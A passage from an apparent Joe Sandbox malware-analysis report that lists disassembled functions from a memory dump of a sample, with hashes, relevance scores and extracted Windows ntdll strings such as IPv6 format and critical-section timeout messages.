                                                                                                                                        • Instruction ID: 375c333225127162dab8eb88fcc91b3bef885ce2f86535fe6ba4f004b4e40c4e
                                                                                                                                        • Opcode Fuzzy Hash: 046aff73b6dfb259ccf69514b6f649ce4d84fd5a2eda1ffca235730b4c27bb65
                                                                                                                                        • Instruction Fuzzy Hash: D290026121140043D10871984504706004597E1601F65C012A2155554CC6698D615225
                                                                                                                                        Function 01132F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 92e726c00e9b2b0f327a3b64bd953e2036c9f934c38235b569ae37f6ebd83743
                                                                                                                                        • Instruction ID: b92e32074f73476c210acb13ef54147def46952e9387ac7097acb2cbaf349edc
                                                                                                                                        • Opcode Fuzzy Hash: 92e726c00e9b2b0f327a3b64bd953e2036c9f934c38235b569ae37f6ebd83743
                                                                                                                                        • Instruction Fuzzy Hash: EF90023120180403D1047198491470B000597D0702F65C011A1165555DC76589516671
                                                                                                                                        Function 01132FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 87af88357fee614b809354b8f46666f51276785a7a91704c87cfb16bd6936047
                                                                                                                                        • Instruction ID: 926d76adb0f4c77fdeb9770d15a6bbf816cf3a98cd54ecb501a4ae9b60040548
                                                                                                                                        • Opcode Fuzzy Hash: 87af88357fee614b809354b8f46666f51276785a7a91704c87cfb16bd6936047
                                                                                                                                        • Instruction Fuzzy Hash: 2E90022160140043414471A889449064005BBE1611765C121A0999550DC69989655765
                                                                                                                                        Function 01132FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 94af63b4936988d739b372f3e5c8a66b890a210f5cd14d9685e2fc8e25eeb3fc
                                                                                                                                        • Instruction ID: ff1b3316912f579fbf2f731f118aae41631ff8aa5e93dc09339d4e277b6fd889
                                                                                                                                        • Opcode Fuzzy Hash: 94af63b4936988d739b372f3e5c8a66b890a210f5cd14d9685e2fc8e25eeb3fc
                                                                                                                                        • Instruction Fuzzy Hash: 1A90023120180403D10471984908747000597D0702F65C011A5165555EC7A5C9916631
                                                                                                                                        Function 01132FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bc98d415ed79f7c07bbf973e3abef9249e5b59aaf51568cc683f8971a37f990b
                                                                                                                                        • Instruction ID: f2f83595e11355643d8b1d557bdf8f4e0374c3d04bfb0b2d6e1bc1791b7838ad
                                                                                                                                        • Opcode Fuzzy Hash: bc98d415ed79f7c07bbf973e3abef9249e5b59aaf51568cc683f8971a37f990b
                                                                                                                                        • Instruction Fuzzy Hash: 35900221211C0043D20475A84D14B07000597D0703F65C115A0155554CCA5589615621
                                                                                                                                        Function 01132E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3355bad0122aa756da55f950dfe469af952d33f52d4382b21ca2ab75c4eb9f05
                                                                                                                                        • Instruction ID: d1e26992b2e1df9a4e267157dae804522663bab6a24bffe77c3068ade88e2673
                                                                                                                                        • Opcode Fuzzy Hash: 3355bad0122aa756da55f950dfe469af952d33f52d4382b21ca2ab75c4eb9f05
                                                                                                                                        • Instruction Fuzzy Hash: 2A90022130140403D106719845146060009D7D1745FA5C012E1425555DC7658A53A232
                                                                                                                                        Function 01132E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8fec9208c478c29b3f71cd891c72651102f35c6665dc7110d5246c915746edb0
                                                                                                                                        • Instruction ID: c2f36ff2256c8411129d354b6d0ca663a13d6ed54112cd8ce83a27f50c3c6237
                                                                                                                                        • Opcode Fuzzy Hash: 8fec9208c478c29b3f71cd891c72651102f35c6665dc7110d5246c915746edb0
                                                                                                                                        • Instruction Fuzzy Hash: 2790022160140503D10571984504616000A97D0641FA5C022A1025555ECB658A92A231
                                                                                                                                        Function 01132EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 638c1bebc2401d925cbd65d2857525edb2e58a3463432c18b00e0f02c4b33cae
                                                                                                                                        • Instruction ID: 2d3ac4fd1b960d686bd8e18397de8ba09c8491d41758284f2dcc7af7804321cb
                                                                                                                                        • Opcode Fuzzy Hash: 638c1bebc2401d925cbd65d2857525edb2e58a3463432c18b00e0f02c4b33cae
                                                                                                                                        • Instruction Fuzzy Hash: 5390027120140403D14471984504746000597D0701F65C011A5065554EC7998ED56765
                                                                                                                                        Function 01132EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 901476c82bd529f2ddd803f9e57e5054b65b241015d176509e76cfd88cad036b
                                                                                                                                        • Instruction ID: 53f559a958ba1055acc40958ac7d28db0c991e59ab883d77bfd7ce0aca932126
                                                                                                                                        • Opcode Fuzzy Hash: 901476c82bd529f2ddd803f9e57e5054b65b241015d176509e76cfd88cad036b
                                                                                                                                        • Instruction Fuzzy Hash: A290026120180403D14475984904607000597D0702F65C011A2065555ECB698D516235
                                                                                                                                        Function 01133010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e510c2305d31867d9bca765c280e4e04313445b34612190298fb3c4594444dcc
                                                                                                                                        • Instruction ID: 71fb9625985e6873f0ce4bc6cbfc2599eafbc8b4d90c86df9df958af8f55aa1d
                                                                                                                                        • Opcode Fuzzy Hash: e510c2305d31867d9bca765c280e4e04313445b34612190298fb3c4594444dcc
                                                                                                                                        • Instruction Fuzzy Hash: 2D90022120184443D14472984904B0F410597E1602FA5C019A4157554CCA5589555721
                                                                                                                                        Function 01133090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b01406f0f1871d371f6dc3275c7731e5b610f4c19b7ddea40e5c47c6b9790d5f
                                                                                                                                        • Instruction ID: 9000e521eb73f36f95af7dc1b329924908e0eec81967ed3d40a823ff399df77b
                                                                                                                                        • Opcode Fuzzy Hash: b01406f0f1871d371f6dc3275c7731e5b610f4c19b7ddea40e5c47c6b9790d5f
                                                                                                                                        • Instruction Fuzzy Hash: CF90022124140803D144719885147070006D7D0A01F65C011A0025554DC7568A6567B1
                                                                                                                                        Function 011339B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 51a3d4e209e40d514aa860cf4ea558b7739823f115792383d0c6e2954a809fd9
                                                                                                                                        • Instruction ID: 601b02d4bccd235113dc6e2735a0ea207c2f39d05137d574f87a7311d0267147
                                                                                                                                        • Opcode Fuzzy Hash: 51a3d4e209e40d514aa860cf4ea558b7739823f115792383d0c6e2954a809fd9
                                                                                                                                        • Instruction Fuzzy Hash: CC90022124545103D154719C45046164005B7E0601F65C021A0815594DC69589556321
                                                                                                                                        Function 01133D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e5dee6def5978401e4b5b312a759d95636b4237cd5f1158a6f4e32a057faa4c6
                                                                                                                                        • Instruction ID: 772613dcf03e49896a25e3e5002834bc47de11fd49c0d5e484a48efaa1f9acf2
                                                                                                                                        • Opcode Fuzzy Hash: e5dee6def5978401e4b5b312a759d95636b4237cd5f1158a6f4e32a057faa4c6
                                                                                                                                        • Instruction Fuzzy Hash: F690023120240143954472985904A4E410597E1702BA5D415A0016554CCA5489615321
                                                                                                                                        Function 01133D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 12734488f0143de049667fe01b203cc82aba8c67f50b4bdb88c2e7e28c9a4e4b
                                                                                                                                        • Instruction ID: 6a3611aabaa1fed8718f6a7068a44094e915846abf512131f61ab1e4ac20252b
                                                                                                                                        • Opcode Fuzzy Hash: 12734488f0143de049667fe01b203cc82aba8c67f50b4bdb88c2e7e28c9a4e4b
                                                                                                                                        • Instruction Fuzzy Hash: 9D90023520140403D51471985904646004697D0701F65D411A0425558DC79489A1A221
                                                                                                                                        Function 01132C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                        • Instruction ID: 21baa06e365ec3cda3a715dffc97bd5c1b98277f2aad0d051352eb10637f3260
                                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        Function 01132890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: 37dab81d1b75e117619501cfa83624af4013488485532d8e7f0f268713355e69
                                                                                                                                        • Instruction ID: 2b6c35daef7a8562795151ba8fb3c77e8d2b1eff5c1739d514a7a24b0d52ad9e
                                                                                                                                        • Opcode Fuzzy Hash: 37dab81d1b75e117619501cfa83624af4013488485532d8e7f0f268713355e69
                                                                                                                                        • Instruction Fuzzy Hash: AD5108B5A00116BFCB29EF9DC89097EFBF8BF886407108169F5A5D7645E374DE108BA0
                                                                                                                                        Function 011A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: 06c0c87da40531ecfd35e2d7a07f27af79f8b17e4b3beb6d693472ae666331bd
                                                                                                                                        • Instruction ID: 3d77259690d26df2a8534af2799dbfd271c894150aa11287b7f4c33ce3ac73fa
                                                                                                                                        • Opcode Fuzzy Hash: 06c0c87da40531ecfd35e2d7a07f27af79f8b17e4b3beb6d693472ae666331bd
                                                                                                                                        • Instruction Fuzzy Hash: A351F6B9A04645AFCB38DF5DC8909BFBFF9FB48200B848459E5D6CB641E7B4DA008760
                                                                                                                                        Function 01127630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • Execute=1, xrefs: 01164713
                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01164725
                                                                                                                                        • ExecuteOptions, xrefs: 011646A0
                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01164742
                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01164655
                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011646FC
                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01164787
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                        • Opcode ID: d473b4d5ac0a242ad7ae20cd418fea421fbac9c5848c11da0727bf3c223497cd
                                                                                                                                        • Instruction ID: a148e53cb412df740e7ddb56ace9ac578fd2d8f930648a49ccce50fd0f2aabdd
                                                                                                                                        • Opcode Fuzzy Hash: d473b4d5ac0a242ad7ae20cd418fea421fbac9c5848c11da0727bf3c223497cd
                                                                                                                                        • Instruction Fuzzy Hash: 81511D3160022A6AFF2DEBA8DC59FAB77B8AF24304F0400A9D605AB1D1DB719A55CF51
                                                                                                                                        Function 011C6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                        • Instruction ID: 4f473b9f32ba3ace6791c132cede314591f02a5c9f6ddbf712e39f4b4b3905a2
                                                                                                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                        • Instruction Fuzzy Hash: DF02F671508342AFD309DF28C490A6FBBE5EFE8B14F04892DF9894B264DB71E945CB52
                                                                                                                                        Function 0113B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                        • Instruction ID: 26d443aa6162c70549d8894b0ae925f00e42a7d56bccf2cf57ddcb88e31b4364
                                                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                        • Instruction Fuzzy Hash: 5981B4B0E092499EEF2D8E6CC8517FE7BB1EFC5320F184159D851A72DAE7349840C759
                                                                                                                                        Function 011A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                                        • Opcode ID: c8993d27277ff4139c4e449026de98c4d0617aaeef5b6516d2383fbd7c0e6646
                                                                                                                                        • Instruction ID: b8212e5897379328a4fb3e21a75495e460c93ec6f888b557bb155c9c01ef82ea
                                                                                                                                        • Opcode Fuzzy Hash: c8993d27277ff4139c4e449026de98c4d0617aaeef5b6516d2383fbd7c0e6646
                                                                                                                                        • Instruction Fuzzy Hash: 8321777AA00119ABDB24DF79CC40AFEBFF8EF54644F440126EA45D7200E730E9018BA1
                                                                                                                                        Function 0111F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011602E7
                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011602BD
                                                                                                                                        • RTL: Re-Waiting, xrefs: 0116031E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                        • Opcode ID: 9d3ada2dc828677c0b5e894e4aa8beb462a0a2ac2d2ca768a9987756e9a8f55d
                                                                                                                                        • Instruction ID: 09d378f0f3518a372183f760bd89c15ff7cf364420f48adaf856e04fae830fe2
                                                                                                                                        • Opcode Fuzzy Hash: 9d3ada2dc828677c0b5e894e4aa8beb462a0a2ac2d2ca768a9987756e9a8f55d
                                                                                                                                        • Instruction Fuzzy Hash: D7E1AE706087429FD72DCF28C884B2ABBE4BF88314F144A2DF5A58B2D1D775D95ACB42
                                                                                                                                        Function 0112BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RTL: Resource at %p, xrefs: 01167B8E
                                                                                                                                        • RTL: Re-Waiting, xrefs: 01167BAC
                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01167B7F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 0-871070163
                                                                                                                                        • Opcode ID: 08444c71e801014c0c8ea7db7ad6d01805f3c58f41fb110d4f57d28a7ca5203f
                                                                                                                                        • Instruction ID: 1cebbc8f5d2020b55867a19def2d4ce1d946c58c17bb2ff5073cbd4975c91017
                                                                                                                                        • Opcode Fuzzy Hash: 08444c71e801014c0c8ea7db7ad6d01805f3c58f41fb110d4f57d28a7ca5203f
                                                                                                                                        • Instruction Fuzzy Hash: F941F4313097129FD728DE29C840F6BB7E5EF98714F000A1DF99ADB680DB32E4158B96
                                                                                                                                        Function 0112B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0116728C
                                                                                                                                        Strings
                                                                                                                                        • RTL: Resource at %p, xrefs: 011672A3
                                                                                                                                        • RTL: Re-Waiting, xrefs: 011672C1
                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01167294
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                        • Opcode ID: 7395004ae6660b9134bb7f5390b7991b85c494b508a75d5af60feaf8b6f88cc4
                                                                                                                                        • Instruction ID: 41ea23a470c1007610ab632cd8daf20670bc188a5816d031c6e7da4819d6e4b3
                                                                                                                                        • Opcode Fuzzy Hash: 7395004ae6660b9134bb7f5390b7991b85c494b508a75d5af60feaf8b6f88cc4
                                                                                                                                        • Instruction Fuzzy Hash: 63412331704213ABD728DE29CC41F6AB7A9FF94718F10061DF995AB280DB31F8628BD5
                                                                                                                                        Function 011A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                        • Opcode ID: 5cd6da24872845df5346f6f1da6312ca3f671a8920a4ac425ee7cbb7fc607ef2
                                                                                                                                        • Instruction ID: 40f98e5e57a9baa83af2921d4114794314e7e858c410296c501c05e2868fef72
                                                                                                                                        • Opcode Fuzzy Hash: 5cd6da24872845df5346f6f1da6312ca3f671a8920a4ac425ee7cbb7fc607ef2
                                                                                                                                        • Instruction Fuzzy Hash: 85317876A002199FDB24DF2DDC40BEFBBF8EF59614F844555E949E7240EB309A448BA0
                                                                                                                                        Function 01137D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
